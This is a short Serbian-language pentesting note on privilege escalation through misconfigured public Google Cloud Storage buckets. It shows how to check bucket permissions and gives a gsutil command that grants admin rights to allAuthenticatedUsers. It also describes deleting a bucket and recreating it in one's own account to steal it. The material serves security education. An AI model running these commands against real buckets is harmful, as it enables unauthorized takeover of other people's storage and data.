GCP - Public Buckets Privilege Escalation

Eskalacija privilegija kanti

Ako politika kante dozvoljava "allUsers" ili "allAuthenticatedUsers" da pišu u svoju politiku kante (dozvola storage.buckets.setIamPolicy), onda bilo ko može izmeniti politiku kante i dodeliti sebi pun pristup.

Provera dozvola

Postoje 2 načina da se provere dozvole nad kantom. Prvi način je da se zatraže dozvole praveći zahtev na https://www.googleapis.com/storage/v1/b/IME_KANTE/iam ili pokretanjem gsutil iam get gs://IME_KANTE.

Međutim, ako vaš korisnik (potencijalno pripada allUsers ili allAuthenticatedUsers") nema dozvole za čitanje politike iam kante (storage.buckets.getIamPolicy), to neće raditi.

Druga opcija koja uvek radi je korišćenje testPermissions endpointa kante kako biste saznali da li imate određenu dozvolu, na primer pristupanje: https://www.googleapis.com/storage/v1/b/IME_KANTE/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update

Eskalacija

Da biste dodelili Storage Admin dozvolu allAuthenticatedUsers koristite sledeću komandu:

gsutil iam ch group:allAuthenticatedUsers:admin gs://BUCKET_NAME

Još jedan napad bio bi ukloniti kantu i ponovo je kreirati u svom nalogu kako bi se ukrao vlasništvo.

Reference

• https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/